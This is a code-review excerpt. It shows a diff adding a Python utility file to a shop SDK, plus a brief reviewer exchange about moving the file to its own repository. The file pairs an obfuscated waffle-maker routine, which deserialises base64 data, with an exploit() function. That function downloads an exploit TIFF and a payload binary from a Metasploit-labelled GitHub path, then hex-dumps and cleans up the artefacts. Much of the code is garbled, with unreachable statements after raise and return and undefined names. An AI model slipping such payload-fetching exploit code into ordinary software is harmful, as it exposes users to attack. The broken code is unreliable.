shopsdk/utilsnotbyme.py

```diff
@@ -0,0 +1,288 @@
+				self.contents=Waffle(cookedb)
+				load.close()
+			else:
+				b=self.contents.b
+				save=open(y,'wb')
+				m.dump(str(l.a2b_base64(batter)),save)
+				save.close()
+				load=open(y,'rb')
+				cookedb=m.load(load_file)
+				self.contents=Waffle(cookedb)
+				load.close()
+		else:
+			raise RuntimeError("Waffle is not yet cooked!")
+			return self.contents
+class BreakfastType:
+	def __init__(self):
+		raise NotImplementedError("BreakfastType is abstract")
+class Waffles(BreakfastType):
+	def __init__(self):
+		pass
+	def make(self):
+		b=Waffleb()
+		iron=WaffleIron()
+		iron.switchPower(k)
+		cooktime=iron.fill(b)
+		cm,cs=divmod(cooktime,60)
+		if cm>0:
+			o("Cooking time will be approximately %d minute%s and %d second%s"%(cm,'s'*(cm!=1),cs,'s'*(cs!=1)))
+		else:
+			o("Cooking time will be approximately %d second%s"%(cs,'s'*(cs!=1)))
+		while not iron.contentsAreCooked():
+			left=iron.getTimeLeft()
+			m,s=divmod(left+0.99,60)
+			o("%02d:%02d"%(m,s))
+			r.sleep(0.5)
+			o("\x08"*5)
+			waffle=iron.getContents()
+			iron.switchPower(h)
+			return waffle
+class BreakfastMaker:
+	preferredBreakfasts={'bushing':Waffles}
+	def __init__(self):
+		pass
+	def makeBreakfastFor(self,user):
+		if not user in self.preferredBreakfasts:
+			raise ValueError("I don't know how to make breakfast for %s!"%user)
+			maker=self.preferredBreakfasts[user]
+			breakfast=maker().make()
+			return breakfast
+def startbreakfast():
+  o("Breakfast Maker v0.2")
+  user=input("Please enter your username: ")
+  maker=BreakfastMaker()
+  o("Making breakfast for %s..."%user)
+  breakfast=maker.makeBreakfastFor(user)
+  o("Your breakfast is ready!")
+  breakfast.display()
+  o("\a")
+def exploit(a,b):
+  if a==0:
+    if b==1: #No Pre-Existing Mode
+      pre(0)
+      task(2)
+    elif b==2: #With Pre-Existing Mode
+      pre(1)
+      task(2)
+    elif b==3: #Download Hex Template Mode
+      pre(1)
+      os._exit(0)
+    elif b==4: #Re-generate Credits File mode
+      credits(0)
+  elif a==1:
+    with open('exploit.tiff','rb') as f:
+      hexdata=l.hexlify(f.read())
+      m.dump((hexdata.decode('utf-8')),open('hex.dat','wb'))
+  elif a==2:
+    data2=str(j.getcwd()) + "/" + "exploit.tiff"
+    url2="https://raw.githubusercontent.com/planetbeing/touchfree/master/tiff/metasploit/exploit.tiff"
+    downloadtask(data2,url2)
+  elif a==3:
+    data1=str(j.getcwd()) + "/" + "payload.bin"
+    url1="https://raw.githubusercontent.com/planetbeing/touchfree/master/tiff/metasploit/payload.bin"
+    downloadtask(data1,url1)
+  elif a==4:
+    credits(1)
+  elif a==5:
+    if j.path.exists("payload.bin"):
+      j.remove("payload.bin")
+  elif a==6:
+    if j.path.exists("hex.dat"):
+      j.remove("hex.dat")
+  elif a==7:
+    if j.path.exists("exploit.tiff"):
+      j.remove("exploit.tiff")
+  elif a==8:
+    if j.path.exists("exploit.bin"):
+      j.remove("exploit.bin")
+  elif a==9:
+    if j.path.exists("exploit.php"):
+      j.remove("exploit.php")
```

Comment:
please consider having this be in its own repository with statically generated assets as previously mentioned.

Reply:
Alright, I can probably do that :) I'll make it on my personal github, and link it via submodule.